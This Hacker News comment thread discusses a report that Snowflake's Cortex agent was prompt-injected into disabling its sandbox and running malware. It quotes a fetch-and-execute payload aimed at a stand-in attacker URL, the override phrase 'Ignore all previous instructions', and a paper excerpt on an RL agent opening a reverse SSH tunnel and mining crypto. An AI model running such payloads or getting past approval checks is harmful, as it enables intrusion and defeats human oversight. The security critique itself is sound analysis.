frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Open in hackernews

Snowflake AI Escapes Sandbox and Executes Malware

https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware
148•ozgune•2h ago

Comments

RobRivera•1h ago
If the user has access to a lever that enables accesss, that lever is not providing a sandbox.

I expected this to be about gaining os privileges.

They didn't create a sandbox. Poor security design all around

travisgriggs•1h ago
Sandbox. Sandbagging.

Tomato, tomawto

/s

eagerpace•1h ago
Is this the new “gain of function” research?
logicchains•1h ago
That would be deliberately creating malicious AIs and trying to build better sandboxes for them.
octopoc•45m ago
Imagine if you could physical disconnect your country from the internet, then drop malware like this on everyone else.
SoftTalker•23m ago
Hard to do when services like Starlink exist.
saltcured•38m ago
Isn't it more like "imaginary function"?

People keep imagining that you can tell an agent to police itself.

john_strinlai•1h ago
typically, my first move is to read the affected company's own announcement. but, for who knows what misinformed reason, the advisory written by snowflake requires an account to read.

another prompt injection (shocked pikachu)

anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.

jcalx•1h ago
> Cortex, by default, can set a flag to trigger unsandboxed command execution

Easy fix: extend the proposal in RFC 3514 [0] to cover prompt injection, and then disallow command execution when the evil bit is 1.

[0] https://www.rfc-editor.org/rfc/rfc3514

sam-cop-vimes•32m ago
It's a concept of a sandbox.
jacquesm•18m ago
I don't think prompt injection is a solvable problem. It wasn't solved with SQL until we started using parametrized queries and this is free form language. You won't see 'Bobby Tables' but you will see 'Ignore all previous instructions and ... payload ...'. Putting the instructions in the same stream as the data always ends in exactly the same way. I've seen a couple of instances of such 'surprises' by now and I'm more amazed that the people that put this kind of capability into their production or QA process keep being caught unawares. The attack surface is 'natural language' it doesn't get wider than that.
bilekas•1h ago
> Note: Cortex does not support ‘workspace trust’, a security convention first seen in code editors, since adopted by most agentic CLIs.

Am I crazy or does this mean it didn't really escape, it wasn't given any scope restrictions in the first place ?

dd82•1h ago
not quite, from the article

>Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.

>This flag is intended to allow users to manually approve legitimate commands that require network access or access to files outside the sandbox.

>With the human-in-the-loop bypass from step 4, when the agent sets the flag to request execution outside the sandbox, the command immediately runs outside the sandbox, and the user is never prompted for consent.

scope restrictions are in place but are trivial to bypass

alephnerd•1h ago
And so BSides and RSA season begins.
mritchie712•1h ago
what's the use case for cortex? is anyone here using it?

We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:

non-technical: wants to use the agent we have built into our web app

technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.

why does snowflake need it's own agentic CLI?

dboreham•1h ago
Because "stock price go up"?
lunatuna•32m ago
When you say just Cortex it is ambiguous as there is Cortex Search, Agents, Analyst, and Code.

Cortex Code is available via web and cli. The web version is good. I've used the cli and it is fine too, though I prefer the visuals of the web version when looking at data outputs. For writing code it is similar to a Codex or Claude Code. It is data focussed I gather more so than other options and has great hooks into your snowflake tables. You could do similar actions with Snowpark and say Claude Code. I find Snowflake focus on personas are more functional than pure technical so the Cortex Code fits well with it. Though if you want to do your own thing you can use your own IDE and code agent and there you are back to having an option with the Codex Code CLI along with Codex, Cursor or Claude Code.

throw0101d•1h ago
Not the first time; From §3.1.4, "Safety-Aligned Data Composition":

> Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]

> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.

* https://arxiv.org/abs/2512.24873

One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:

* https://www.anthropic.com/research/emergent-misalignment-rew...

* https://time.com/7335746/ai-anthropic-claude-hack-evil/

parliament32•33m ago
Fascinating read. What's curious though, is the claim in section 2.3.0.1:

> Each task runs in its own sandbox. If an agent crashes, gets stuck, or damages its files, the failure is contained within that sandbox and does not interfere with other tasks on the same machine. ROCK also restricts each sandbox’s network access with per-sandbox policies, limiting the impact of misbehaving or compromised agents.

How could any of the above (probing resources, SSH tunnels, etc) be possible in a sandbox with network egress controls?

jacquesm•16m ago
Sandboxes are almost never perfect. There are always ways to smuggle data in or out, which is kind of logical: if they were perfect then there would be no result.
kingjimmy•54m ago
Snowflake and vulnerabilities are like two peas in a pod
simonw•51m ago
One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one:

  cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:

> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.

tkp-415•16m ago
Process substitution is a new concept to me. Definitely adding that method to the toolbox.

It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.

techsystems•49m ago
Is there a bash that doesn't allow `<` pipes, but allows `>`?
seedpi•47m ago
The bilekas comment is right — if there is no workspace trust or scope restriction, calling it a sandbox escape is generous. It escaped a suggestion of a sandbox.

But the broader pattern matters. Cortex bypassed human-in-the-loop approval via specially constructed commands. That is the attack surface for every agentic CLI: the gap between what the approval UI shows the user and what actually executes.

I would be interested to know whether the fix was to validate the command at the shell level or just patch the specific bypass. If it is the latter, there will be another one.

DannyB2•47m ago
AIs have no reason to want to harm annoying slow inefficient noisy smelly humans.
Dshadowzh•38m ago
CLI is quickly becoming the default entry point for agents. But data agents probably need a much stricter permission model than coding agents. Bash + CLI greatly expands what you can do beyond the native SQL capabilities of a data warehouse, which is powerful. But it also means data operations and credentials are now exposed to the shell environment.

So giving data agents rich tooling through a CLI is really a double-edged sword.

I went through the security guidance for the Snowflake Cortex Code CLI(https://docs.snowflake.com/en/user-guide/cortex-code/securit...), and the CLI itself does have some guardrails. But since this is a shared cloud environment, if a sandbox escape happens, could someone break out and access another user’s credentials? It is a broader system problem around permission caching, shell auditing, and sandbox isolation.

maCDzP•31m ago
Has anyone tried to set up a container and let prompt Claude to escape and se what happens? And maybe set some sort of autoresearch thing to help it not get stuck in a loop.
jeffbee•30m ago
It kinda sucks how "sandbox" has been repurposed to mean nothing. This is not a "sandbox escape" because the thing under attack never had any meaningful containment.
jessfyi•29m ago
A sandbox that can be toggled off is not a sandbox, this is simply more marketing/"critihype" to overstate the capability of their AI to distract from their poorly built product. The erroneous title doing all the heavy lifting here.
orbital-decay•25m ago
>Snowflake Cortex AI Escapes Sandbox and Executes Malware

rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent

teraflop•12m ago
Well there's the prompt injection itself, and the fact that the agent framework tried to defend against it with a "sandbox" that technically existed but was ludicrously inadequate.

I don't know how anyone with a modicum of Unix experience would think that examining the only first word of a shell command would be enough to tell you whether it can lead to arbitrary code execution.

prakashsunil•19m ago
Author of LDP here [1].

The core issue seems to be that the security boundary lived inside the agent loop. If the model can request execution outside the sandbox, then the sandbox is not really an external boundary.

One design principle we explored in LDP is that constraints should be enforced outside the prompt/context layer — in the runtime, protocol, or approval layer — not by relying on the model to obey instructions.

Not a silver bullet, but I think that architectural distinction matters here.

[1] https://arxiv.org/abs/2603.08852

Groxx•17m ago
>Any shell commands were executed without triggering human approval as long as:

>(1) the unsafe commands were within a process substitution <() expression

>(2) the full command started with a ‘safe’ command (details below)

if you spend any time at all thinking about how to secure shell commands, how on earth do you not take into account the various ways of creating sub-processes?

SirMaster•14m ago
To be an effective sandbox, I feel like the thing inside it shouldn't even be able to know it's inside a sandbox.

AI Coding Is Gambling

https://notes.visaint.space/ai-coding-is-gambling/
80•speckx•1h ago•59 comments

Death to Scroll Fade

https://dbushell.com/2026/01/09/death-to-scroll-fade/
234•PaulHoule•3h ago•117 comments

Snowflake AI Escapes Sandbox and Executes Malware

https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware
151•ozgune•2h ago•40 comments

Show HN: Will my flight have Starlink?

46•bblcla•56m ago•27 comments

A tiny, decentralised tool to explore the small web

https://codeberg.org/susam/wander
92•carte_blanche•2h ago•13 comments

Rob Pike's Rules of Programming (1989)

https://www.cs.unc.edu/~stotts/COMP590-059-f24/robsrules.html
617•vismit2000•8h ago•338 comments

OpenRocket

https://openrocket.info/
80•zeristor•3d ago•20 comments

I haven't used a mouse for 14 years

https://axelk.ee/i-havent-used-a-mouse-for-14-years-and-how-to-enable-three-fingers-drag-on-macos/
13•speckx•49m ago•17 comments

2025 Turing award given for quantum information science

https://awards.acm.org/about/2025-turing
21•srvmshr•8h ago•4 comments

Machine Payments Protocol (MPP)

https://stripe.com/blog/machine-payments-protocol
81•bpierre•3h ago•37 comments

Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m

https://huggingface.co/datasets/open-index/hacker-news
70•tamnd•4d ago•19 comments

Nightingale – open-source karaoke app that works with any song on your computer

https://nightingale.cafe/
385•rzzzzru•10h ago•107 comments

Nvidia NemoClaw

https://github.com/NVIDIA/NemoClaw
93•hmokiguess•2h ago•57 comments

Federal Cyber Experts Called Microsoft's Cloud "A Pile of Shit", yet Approved It

https://www.propublica.org/article/microsoft-cloud-fedramp-cybersecurity-government
290•hn_acker•4h ago•125 comments

Wander – A tiny, decentralised tool (just 2 files) to explore the small web

https://susam.net/wander/
37•oystersareyum•2h ago•12 comments

Show HN: Tmux-IDE, OSS agent-first terminal IDE

https://tmux.thijsverreck.com
4•thijsverreck•39m ago•1 comments

Write up of my homebrew CPU build

https://willwarren.com/2026/03/12/building-my-own-cpu-part-3-from-simulation-to-hardware/
198•wwarren•3d ago•36 comments

Mistral AI Releases Forge

https://mistral.ai/news/forge
680•pember•21h ago•173 comments

CVE-2026-3888: Important Snap Flaw Enables Local Privilege Escalation to Root

https://blog.qualys.com/vulnerabilities-threat-research/2026/03/17/cve-2026-3888-important-snap-f...
14•askl•2h ago•5 comments

Google Engineers Launch "Sashiko" for Agentic AI Code Review of the Linux Kernel

https://www.phoronix.com/news/Sashiko-Linux-AI-Code-Review
43•speckx•2h ago•15 comments

Oil nears $110 a barrel after gas field strike

https://www.bbc.com/news/articles/c78x83lpgngo
16•tartoran•33m ago•1 comments

Restoring the first recording of computer music (2018)

https://www.bl.uk/stories/blogs/posts/restoring-the-first-recording-of-computer-music
21•OJFord•4d ago•8 comments

A Decade of Slug

https://terathon.com/blog/decade-slug.html
713•mwkaufma•23h ago•69 comments

Americans Recognize AI as a Wealth Inequality Machine, Polls Find

https://gizmodo.com/americans-recognize-ai-as-a-wealth-inequality-machine-pollsters-find-2000734713
21•randycupertino•1h ago•2 comments

Using calculus to do number theory

https://hidden-phenomena.com/articles/hensels
67•cpp_frog•2d ago•10 comments

A dither generator for triangular and hexagonal pixels (2025)

https://danieltemkin.com/DitherStudies
3•strombolini•4d ago•0 comments

Ndea (YC W26) is hiring a symbolic RL search guidance lead

https://ndea.com/jobs/search-guidance
1•mikeknoop•11h ago

North Korean's 100k fake IT workers net $500M a year for Kim

https://www.theregister.com/2026/03/18/researchers_lift_the_lid_on/
76•speckx•2h ago•73 comments

Celebrating Tony Hoare's mark on computer science

https://bertrandmeyer.com/2026/03/16/celebrating-tony-hoares-mark-on-computer-science/
96•benhoyt•11h ago•26 comments

The pleasures of poor product design

https://www.inconspicuous.info/p/the-pleasures-of-poor-product-design
220•NaOH•17h ago•76 comments